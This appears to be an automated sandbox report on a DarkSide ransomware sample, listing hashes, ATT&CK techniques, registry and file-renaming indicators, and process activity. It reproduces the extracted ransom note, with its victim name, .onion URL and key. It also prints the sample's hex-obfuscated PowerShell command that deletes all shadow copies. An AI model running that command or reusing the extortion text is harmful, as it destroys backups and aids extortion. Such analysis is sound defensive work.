darkside | 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60

General

Target

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Size

59KB
MD5

0ed51a595631e9b4d60896ab5573332f
SHA1

7ae73b5e1622049380c9b615ce3b7f636665584b
SHA256

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
SHA512

9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\InitializeStep.tif => C:\Users\Admin\Pictures\InitializeStep.tif.341d6443	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeStep.tif.341d6443	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveStart.tiff	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File renamed	C:\Users\Admin\Pictures\RemoveStart.tiff => C:\Users\Admin\Pictures\RemoveStart.tiff.341d6443	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveStart.tiff.341d6443	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Modifies registry class 5 IoCs

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443"	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

pid	process
1776	powershell.exe
1776	powershell.exe
1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSecurityPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeTakeOwnershipPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeLoadDriverPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSystemProfilePrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSystemtimePrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeProfSingleProcessPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeIncBasePriorityPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeCreatePagefilePrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeBackupPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeRestorePrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeShutdownPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeDebugPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeSystemEnvironmentPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeRemoteShutdownPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeUndockPrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeManageVolumePrivilege	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 33	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 34	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: 35	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeBackupPrivilege	1492	vssvc.exe
Token: SeRestorePrivilege	1492	vssvc.exe
Token: SeAuditPrivilege	1492	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe

description	pid	process	target process
PID 1996 wrote to memory of 1776	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe	powershell.exe
PID 1996 wrote to memory of 1776	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe	powershell.exe
PID 1996 wrote to memory of 1776	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe	powershell.exe
PID 1996 wrote to memory of 1776	1996	243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe
"C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.sample.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
ded84bbbd45365d6b61e3605dd94e791

SHA1
e08e94759114e938cdb339e5e4859ca625f1c96e

SHA256
6cb70d130f217bcca610592cfcf0219bd0ade65a89779701b6fcafbd8fcdfecf

SHA512
357f0db459415ae2e9f2beb088819e9b8bb65468dea7ca5c3fe9a4380899d9289b5b52ce68d7e09b758278a3ba0440847955f7803c33a788a2a41a137585d332

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
9d35a340286ab24713cf65a224b0956f

SHA1
53828bee0b99a5273f13ed05cd620ebf765dd56c

SHA256
08bef31aa537318a22fd6c8097c2495bf482573b8151535ca960c0124fe03414

SHA512
d4aa15cc5be1e491edd0c6c152d4bd820984ea86722e8f485c8202000a33c0974749aa7f47535ef530edf2fd8a51d9d1232fc5ca5a54ae940bbf2dd0a56b4e5f

Download Submit
memory/1776-67-0x000000001ABC4000-0x000000001ABC6000-memory.dmp

Filesize
8KB

Download
memory/1776-63-0x0000000002320000-0x0000000002321000-memory.dmp

Filesize
4KB

Download
memory/1776-64-0x000000001AC40000-0x000000001AC41000-memory.dmp

Filesize
4KB

Download
memory/1776-65-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/1776-66-0x000000001ABC0000-0x000000001ABC2000-memory.dmp

Filesize
8KB

Download
memory/1776-68-0x00000000023E0000-0x00000000023E1000-memory.dmp

Filesize
4KB

Download
memory/1776-69-0x000000001C340000-0x000000001C341000-memory.dmp

Filesize
4KB

Download
memory/1776-70-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/1776-62-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

Filesize
8KB

Download
memory/1776-61-0x0000000000000000-mapping.dmp

Download
memory/1996-60-0x0000000074FB1000-0x0000000074FB3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads